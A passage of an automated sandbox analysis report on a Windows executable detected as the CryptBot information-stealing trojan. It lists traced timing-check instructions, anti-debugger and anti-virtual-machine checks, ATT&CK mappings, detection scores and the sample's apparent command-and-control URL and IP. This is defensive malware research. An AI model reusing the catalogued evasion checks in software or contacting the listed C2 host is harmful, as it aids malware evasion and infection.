Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141532 second address: 71415ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d pushad 0x0000000e push ecx 0x0000000f mov ebx, 429DAD70h 0x00000014 pop edx 0x00000015 pushfd 0x00000016 jmp 00007FEA75199F76h 0x0000001b jmp 00007FEA75199F75h 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, dword ptr [esi+34h] 0x00000025 pushad 0x00000026 mov dx, si 0x00000029 pushfd 0x0000002a jmp 00007FEA75199F78h 0x0000002f sub eax, 59ED2F48h 0x00000035 jmp 00007FEA75199F6Bh 0x0000003a popfd 0x0000003b popad 0x0000003c mov dword ptr [edx+34h], eax 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 pushfd 0x00000043 jmp 00007FEA75199F6Bh 0x00000048 add si, 918Eh 0x0000004d jmp 00007FEA75199F79h 0x00000052 popfd 0x00000053 mov ebx, esi 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71415ED second address: 714160F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edx, 4BE9EF9Eh 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714160F second address: 714166A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FEAE2E58058h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FEA75199F6Eh 0x00000016 adc eax, 147B5998h 0x0000001c jmp 00007FEA75199F6Bh 0x00000021 popfd 0x00000022 mov esi, 0E66C34Fh 0x00000027 popad 0x00000028 or dword ptr [edx+38h], FFFFFFFFh 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FEA75199F71h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714166A second address: 714168B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 movzx ecx, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c or dword ptr [edx+3Ch], FFFFFFFFh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEA75194B4Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714168B second address: 714168F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714168F second address: 7141695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141695 second address: 71416AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F73h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71416AC second address: 71416B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71416B0 second address: 71416CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+40h], FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEA75199F70h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71416CE second address: 71416D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71416D4 second address: 71416D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71416D8 second address: 71416F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEA75194B4Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71416F0 second address: 714170D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714170D second address: 714171D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75194B4Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714171D second address: 7141730 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, 2F9Fh 0x00000010 mov edx, esi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 7141730 second address: 7141736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 7141736 second address: 714173A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 714173A second address: 714173E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 714173E second address: 714175B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEA75199F72h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 7190C61 second address: 7190C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 7190C67 second address: 7190C78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F6Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 7190C78 second address: 7190C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 7190C7C second address: 7190CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FEA75199F6Ah 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FEA75199F77h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 7190CAB second address: 7190CD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 mov di, C266h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEA75194B58h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 7190CD3 second address: 7190CE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F6Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 7190CE5 second address: 7190CF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 7190CF4 second address: 7190CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 7190CF8 second address: 7190CFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 7190CFC second address: 7190D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 71307A1 second address: 71307A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 71307A5 second address: 71307A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 71307A9 second address: 71307AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 71307AF second address: 71307B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 71307B6 second address: 7130811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FEA75194B56h 0x0000000f sbb cx, FCA8h 0x00000014 jmp 00007FEA75194B4Bh 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007FEA75194B56h 0x00000022 add cx, EF08h 0x00000027 jmp 00007FEA75194B4Bh 0x0000002c popfd 0x0000002d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 7130811 second address: 7130866 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FEA75199F6Bh 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FEA75199F76h 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 jmp 00007FEA75199F6Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 pop edi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 70D002B second address: 70D0032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, 1Ch 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 70D0032 second address: 70D0067 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEA75199F72h 0x00000009 sbb eax, 011F1D58h 0x0000000f jmp 00007FEA75199F6Bh 0x00000014 popfd 0x00000015 mov dx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 70D0067 second address: 70D007E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 70D007E second address: 70D0084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 70D0084 second address: 70D00BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b movsx edi, cx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007FEA75194B54h 0x00000016 sbb cx, 0148h 0x0000001b jmp 00007FEA75194B4Bh 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 70D05BD second address: 70D05E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FEA75199F76h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 70D05E9 second address: 70D05EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | RDTSC instruction interceptor: First address: 70D05EF second address: 70D0609 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Special instruction interceptor: First address: 170A407 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Special instruction interceptor: First address: 1795630 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_01079980 rdtsc 0_2_01079980
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe TID: 6888 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00E9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00E9255D
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00E929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00E929FF
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_00E9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00E9255D
Source: FIyDwZM4OR.exe, FIyDwZM4OR.exe, 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: FIyDwZM4OR.exe | Binary or memory string: Hyper-V RAW
Source: FIyDwZM4OR.exe, 00000000.00000003.1776066218.00000000009C2000.00000004.00000020.00020000.00000000.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1776675480.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, FIyDwZM4OR.exe, 00000000.00000002.1797842430.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1776283870.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1776258710.00000000009C7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
Source: FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: FIyDwZM4OR.exe, 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: FIyDwZM4OR.exe, 00000000.00000003.1714678002.0000000000972000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: FIyDwZM4OR.exe, 00000000.00000003.1716250220.00000000069A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlM!
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_07170138 Start: 0717069D End: 071701BC 0_2_07170138
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | File opened: NTICE
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | File opened: SICE
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Code function: 0_2_01079980 rdtsc 0_2_01079980
Source: FIyDwZM4OR.exe, FIyDwZM4OR.exe, 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: ]Program Manager
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: procmon.exe
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.4:49731 -> 81.29.149.125:80
MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the count of matching signatures shown on the matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (24); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (24); Process Discovery (13); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (216)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (11); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (2); Non-Application Layer Protocol (3); Application Layer Protocol (4); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
FIyDwZM4OR.exe | 60% | Virustotal |
FIyDwZM4OR.exe | 66% | ReversingLabs | Win32.Trojan.CryptBot
FIyDwZM4OR.exe | 100% | Avira | TR/Crypt.TPM.Gen
FIyDwZM4OR.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument= | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fiveth5ht.top | 81.29.149.125 | true | false | | high
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high
httpbin.org | 3.218.7.103 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | false | | high
https://httpbin.org/ip | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://html4/loose.dtd | FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | FIyDwZM4OR.exe | false | | high
https://httpbin.org/ipbefore | FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/http-cookies.html | FIyDwZM4OR.exe, FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/hsts.html# | FIyDwZM4OR.exe | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/http-cookies.html# | FIyDwZM4OR.exe | false | | high
https://curl.se/docs/alt-svc.html | FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.css | FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument= | FIyDwZM4OR.exe, 00000000.00000003.1776258710.00000000009C7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://.jpg | FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
81.29.149.125 | home.fiveth5ht.top | Switzerland (CH) | 39616 | COMUNICA_IT_SERVICES | false
3.218.7.103 | httpbin.org | United States (US) | 14618 | AMAZON-AES | false
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1581622
                                    Start date and time:2024-12-28 09:59:21 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 4m 16s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:2
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
